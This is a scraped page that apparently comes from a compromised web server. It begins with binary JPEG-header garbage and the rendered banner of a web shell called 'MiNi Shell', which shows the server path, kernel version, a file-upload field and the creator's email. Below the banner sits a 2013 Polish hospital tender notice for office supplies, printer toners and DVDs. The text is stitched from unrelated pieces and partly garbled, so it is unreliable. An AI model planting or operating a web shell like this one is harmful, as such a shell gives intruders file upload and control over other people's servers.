JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130128/37800-N-2013.html

<p class="kh_header"><b>Suwałki: na dostawę artykułów biurowych, papierniczych, tonerów do drukarek laserowych, wkładów drukujących na okres 1-go roku dla SZW w Suwałkach</b><br>
<b>Numer ogłoszenia: 37800 - 2013; data zamieszczenia: 28.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Wojewódzki im. dr. Ludwika Rydygiera w Suwałkach , ul. Szpitalna 60, 16-400 Suwałki, woj. podlaskie, tel. 087 5629582, 5629462, 5629595, faks 087 5629594.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.suwalki.pl/przetargi</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> na dostawę artykułów biurowych, papierniczych, tonerów do drukarek laserowych, wkładów drukujących na okres 1-go roku dla SZW w Suwałkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów biurowych, papierniczych, tonerów do drukarek , wkładów drukujących dla SZW w Suwałkach w asortymencie i w szacunkowej ilości określonych w załączniku nr 7 do SIWZ w okresie 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.12.51.10-5, 30.19.21.13-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Każda oferta musi być zabezpieczona wadium o wartości; dla ofert całkowitych 2.225,00 PLN (Pakiety łącznie), dla ofert częściowych zgodnie z załącznikiem nr 6 do SIWZ
2.	Wadium może być wniesione w pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej (musi być poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych oraz poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości 
(art.45 ust. 6  PZP). 
3.	Wadium musi być udzielane do końca terminu związania ofertą.                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           
4.	Wadium wnosi się przed upływem terminu składania ofert.
5.	Wadium wnoszone w pieniądzu  wpłaca się  przelewem na poniższy rachunek bankowy Zamawiającego :  

KREDYT BANK S.A. 1710 Oddział KB S.A.  w Suwałkach Nr konta 42 1500 1719 1217 1002 6998 0000

6.Warunki zwrotu wadium i utraty wadium reguluje art. 46 ustawy pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia: oświadczeniem o spełnianiu warunków udziału w postępowaniu(Załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia: oświadczeniem o spełnianiu warunków udziału w postępowaniu(Załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia: oświadczeniem o spełnianiu warunków udziału w postępowaniu(Załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia: oświadczeniem o spełnianiu warunków udziału w postępowaniu(Załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>do potwierdzenia: oświadczeniem o spełnianiu warunków udziału w postępowaniu(Załącznik nr 3 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełnionego arkusza asortymentowo - cenowego (wzór stanowi załącznik nr 7 do SIWZ).
na potwierdzenie spełnienia zapisów SIWZ Zamawiający może wezwać Wykonawcę do przedstawienia oświadczeń; nieodpłatnych, bezzwrotnych próbek oraz innych dokumentów dotyczących zaoferowanego asortymentu.
Dowód wpłaty wadium
Oświadczenia - załącznik nr 5 do SIWZ (jeśli dotyczy)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1	Sporządzony przez Wykonawcę według instrukcji podanej w załączniku nr 1 do SIWZ  Druk Oferty.
2	Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu wymienionego w pkt. 4.2. - w oryginale lub poświadczone notarialnie lub opatrzone adnotacją za zgodność z oryginałem pieczęcią wykonawcy, imienną pieczątką osoby upoważniającej na podstawie dokumentu wymienionego w punkcie 4.2. oraz jej podpisem.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający może odstąpić od niniejszej umowy w trybie i na zasadach określonych w art. 145 ustawy Prawo zamówień publicznych.
2.	Zamawiający działając w oparciu o art. 144 ust 1 ustawy Prawo zamówień publicznych określa następujące okoliczności, które mogą powodować konieczność wprowadzenia zmian w treści zawartej umowy w stosunku do treści złożonej oferty:
a) wydłużenia terminu realizacji umowy, Zamawiający dopuszcza przedłużenie terminu obowiązywania umowy w przypadku niewyczerpania, kwoty określonej w §1 ust.4 umowy.

b)   zamiany poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy, z chwilą zaprzestania lub wstrzymania jego produkcji, a o czym Wykonawca nie mógł wiedzieć z chwilą zawarcia niniejszej umowy, na tzw. zamiennik pod warunkiem, że spełni on wszystkie wymogi Zamawiającego w tym również cenę jednostkową netto i brutto;

c)   Zamawiający zastrzega sobie możliwość zmiany ilości poszczególnego asortymentu, będącego przedmiotem umowy i wyszczególnionego w Załączniku nr 1 do niniejszej umowy w zakresie łącznej wartości umowy, o której mowa w § 1 ust. 4 projektu umowy.

d)   numeru katalogowego produktu lub nazwy własnej produktu, zmianę sposobu konfekcjonowania - w przypadku, gdy wprowadzony zostanie na rynek produkt zmodyfikowany bądź udoskonalony albo wystąpi  przejściowy brak produktu, albo wpłynie motywacja ze wskazaniem na konkretnego pacjenta z Kliniki Neurochirurgii, przy czym nie wpłynie to na zwiększenie wartości pakietu i będzie to produkt o parametrach nie gorszych od produktu objętego umową;  wprowadzony zostanie do sprzedaży przez Wykonawcę produkt zmodyfikowany lub udoskonalony

e)    zmiana ceny w przypadku zmiany przepisów prawa podatkowego w okresie obowiązywania umowy dotyczących stawek VAT, przy czym zmiana nastąpi w wartości netto, natomiast wartość brutto pozostaje bez zmian.
Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej, wartości umowy i nie mogą być niekorzystne dla Zamawiającego.
3.	Wszelkie zmiany i uzupełnienia treści umowy wymagają formy pisemnej w postaci aneksu pod rygorem nieważności. 
4.	Strony zgodnie ustalają, że w przypadku: 
1)       zmiany statusu prawnego Zamawiającego, 
2)       ograniczenia lub utraty istotnej części kontraktu z Narodowym Funduszem Zdrowia, 
3)       istotnego ograniczenia zakresu i ilości świadczonych usług medycznych , 
4)      zmian organizacyjnych u Zamawiającego, 
- rozwiązanie  zawartej   umowy  może  nastąpić  w  każdym  czasie  za  porozumieniem  stron  lub  w  drodze miesięcznego jej   
  wypowiedzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Wojewódzki im. dr Ludwika Rydygiera w Suwałkach, ul. Szpitalna 60, 16 - 400 Suwałki, Dział Zamówień i Inwestycji, pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2013 godzina 09:30, miejsce: Szpital Wojewódzki im. dr Ludwika Rydygiera w Suwałkach, ul. Szpitalna 60, 16 - 400 Suwałki, Sekretariat pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pakiet 1 różny sprzęt i artykuły biurowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Dowód wpłat bankowych 4	bloczki	10
2	Dyplom	op	8
3	Dziennik kancelaryjny	szt	8
4	Dziurkacz 	szt	8
5	Etykieta termiczna do metkownicy	rolki	500
6	Etykieta termiczna do metkownicy	rolki	500
7	Etykieta termiczna do metkownicy	rolki	20
8	Folia do faksu termotransferowa	szt	6
9	Folia do faksu termotransferowa	szt	6
10	Folia do faksu termotransferowa	szt	10
11	Folia do laminatora	op	2
12	Folia do laminatora	op	1
13	Folia do laminatora	op	2
14	Foliopis	szt	560
15	Grzbiet do bindowania	szt	200
16	Kalka	op	2
17	Karteczki samoprzylepne	bloczki	20
18	Karton archiwizacyjny	szt	600
19	Karta drogowa	bloczki	5
20	Klej biurowy	szt	1000
21	Koperty	op	5
22	Koperty	op	50
23	Koperty	op	7
24	Koperty	op	2
25	Koperty	szt	350
26	Koperty	szt	80
27	Koperty	szt	20
28	Koperty 	szt	6000
29	Koperty	szt	3000
30	Koperty	szt	18000
31	Koperty	szt	18000
32	Koperta do wpłat do banku	paczka	3
33	Korektor	szt	40
34	Koszulka do dokumentów	op	38
35	Okładka do bindowania	szt	50
36	Papier do faksu	rolki	48
37	Papier do faksu	rolki	10
38	Papier samoprzylepny	op	1
39	Papier składanka 240x12 /1 + 1/	op	8
40	Papier składanka 240x12 /1 + 2/	op	6
41	Papier termoczuły	rolki	12
42	Polecenie przelewu	szt	10
43	Rolka termiczna 	szt	270
44	Rolka termiczna	szt	100
45	RW	bloczki	140
46	RW	bloczki	70
47	Segregator A4	szt	500
48	Skoroszyt	szt	800
49	Skoroszyt	szt	120
50	Skoroszyt	szt	30
51	Skorowidz	szt	20
52	Spinacze biurowe	szt	40
53	Spinacze biurowe	szt	400
54	Taśma do drukarki	szt	5
55	Taśma do metkownicy 	szt	30
56	Taśma samoprzylepna	szt	35
57	Taśma samoprzylepna	szt	10
58	Taśma samoprzylepna	op	3
59	Teczka do dyplomu	szt	20
60	Teczka wiązana	szt	40
61	Teczka wiązana	szt	70
62	Zakreślacz	szt	12
63	Zeszyt akademicki	szt	96
64	Zeszyt zwykły	szt	650
65	Zszywacz 	szt	19
66	Zszywki	op	12
67	Zszywki	op	450
68	Tusz do pieczątek	szt	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pakiet 2 papier do drukowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Papier xero	ryzy A4	70
2	Papier xero	ryzy	250
3	Papier xero	ryzy	2430
4	Papier xero	ryzy	170.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.76.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pakiet 3 tonery i wkłady drukujące.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Toner do drukarki	BROTHER HL 4040 C oryginał, kolor        	szt	18
2	Toner do drukarki	BROTHER HL 4040 C oryginał, czarny	szt	9
3	Toner do drukarki	BROTHER MFC-9450 KBL 135 B, czarny	szt	6
4	Toner do drukarki	BROTHER MFC-9450 KBL 135 C+M+Y (kolor)	szt	12
5	Toner do drukarki	BROTHER TN 3130	szt	4
6	Toner do drukarki	CANON   N P 1215 (op. 4 szt.)	op	4
7	Toner do drukarki	Canon iR 2230	szt	15
8	Toner do drukarki	HP M 1120  nr 36A	szt	36
9	Toner do drukarki	HP M 1132   nr 85A	szt	41
10	Toner do drukarki	HP P 1005, 1006   nr 35A	szt	67
11	Toner do drukarki	HP P 1018, 1020, 3015, 1010	szt	180
12	Toner do drukarki	HP P 1100	szt	8
13	Toner do drukarki	HP P 1102	szt	85
14	Toner do drukarki	HP P 1160   nr 49A	szt	37
15	Toner do drukarki	HP P 1320 (oryginał)	szt	4
16	Toner do drukarki	HP P 1566, 1606, nr 78,  1536(oryginał)	szt	44
17	Toner do drukarki	HP P 1600 czarny (oryginał)	szt	1
18	Toner do drukarki	HP P 1600 kolor (oryginał)	szt	3
19	Toner do drukarki	HP P 2015   nr 53A	szt	14
20	Toner do drukarki	HP P 2035, 2055	szt	24
21	Toner do drukarki	HP P 3100	szt	5
22	Toner do drukarki	HP Enterprise 500 color M551 dn	szt	1
23	Toner do drukarki	iR Canon 1020	szt	2
24	Toner do drukarki	KYOCERA KM 1635 (oryginał)	szt	3
25	Toner do drukarki	KYOCERA KM 3050	szt	5
26	Toner do drukarki	KYOCERA FS-C 5100 czarny + pojemnik (oryginał)	szt	6
27	Toner do drukarki	KYOCERA FS-C 5100 kolor + pojemnik (oryginał)	szt	9
28	Toner do drukarki	Lexmark E 220 	szt	24
29	Toner do drukarki	Lexmark E 360 	szt	14
30	Toner do drukarki	OKI C-110	szt	2
31	Toner do drukarki	Samsung CLP 320  (czarny) - (oryginał)	szt	6
32	Toner do drukarki	Samsung CLP 320  (kolor)	szt	6
33	Toner do drukarki	Samsung CSX 4200	szt	24
34	Toner do drukarki	Samsung ML 1640	szt	20
35	Toner do drukarki	Samsung ML 1675	op	4
36	Toner do drukarki	Samsung ML 2850 (oryginał)	szt	3
37	Toner do drukarki	Samsung ML-1640	szt	4
38	Toner do drukarki	Samsung SCX 3200	szt	10
39	Toner do drukarki	Samsung SCX 4100	szt	2
40	Toner do drukarki	Samsung SCX-4521	szt	24
41	Toner do drukarki	Xerox Worcentere 3119	szt	3
42	Toner do drukarki	Xerox Worcentere PE 220 czarny	szt	5
43	Toner do drukarki	Xerox Workcentre 5220  czarny	szt	4
44	Tusz do drukarki	Canon 280	szt	2
45	Tusz do drukarki	Epson DX 4850    611 (czarny)	szt	2
46	Tusz do drukarki	Epson DX 4850    612 (kolor)	szt	2
47	Tusz do drukarki	Epson DX 4850    613 (kolor)	szt	2
48	Tusz do drukarki	Epson DX 4850    614 (kolor)	szt	2
49	Tusz do drukarki	HP 3550	szt	2
50	Tusz do drukarki	HP 3745	szt	10
51	Tusz do drukarki	HP 940  czarny	szt	4
52	Tusz do drukarki	HP 940  kolor	szt	1
53	Tusz do drukarki	HP Advantage 2515 czarny	szt	4
54	Tusz do drukarki	HP Advantage 2515 kolor	szt	4
55	Tusz do drukarki	HP Deskret 7100	szt	2
56	Tusz do drukarki	HPD 1360   H-21	szt	6
57	Tusz do kserokopiarki	F 2180 czarny	szt	4
58	Tusz do kserokopiarki	F 2180 kolor	szt	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.19.21.13-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> pakiet 4 płyty kompaktowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Płyta CD-R z kopertą 	dobrej jakości	szt	110
2	Płyta DVD	do nadruku atramentowego	szt	18000
3	Płyta DVD-R/+R	dobrej jakości	szt	20
4	Płyta DVD-R/+R  Double	op. 10 szt.	op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.43.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com